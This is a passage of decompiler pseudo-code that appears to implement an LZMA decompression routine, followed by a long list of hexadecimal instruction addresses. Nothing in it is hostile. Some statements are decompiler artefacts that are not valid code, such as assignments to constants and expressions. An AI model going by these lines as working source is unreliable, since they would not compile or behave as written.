												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x00406402
                                                                                                        0x00406408
                                                                                                        0x0040641a
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x004063d6
                                                                                                        0x004063dc
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x004069b7
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x004069c8
                                                                                                        0x004069cf
                                                                                                        0x004069d3
                                                                                                        0x004069d3
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c3
                                                                                                        0x004060c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406133
                                                                                                        0x00406136
                                                                                                        0x004061a7
                                                                                                        0x004061aa
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x00406138
                                                                                                        0x0040613c
                                                                                                        0x0040613f
                                                                                                        0x00406141
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x00406159
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x0040616e
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x0040617e
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00000000
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x00406189
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406461
                                                                                                        0x00406464
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406440
                                                                                                        0x00406443
                                                                                                        0x00406446
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00406459
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406491
                                                                                                        0x00406493
                                                                                                        0x00406497
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064f9
                                                                                                        0x004064fc
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x004064f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x0040652f
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00406538
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406542
                                                                                                        0x00406547
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061ca
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x00000000
                                                                                                        0x0040693b
                                                                                                        0x004061d4
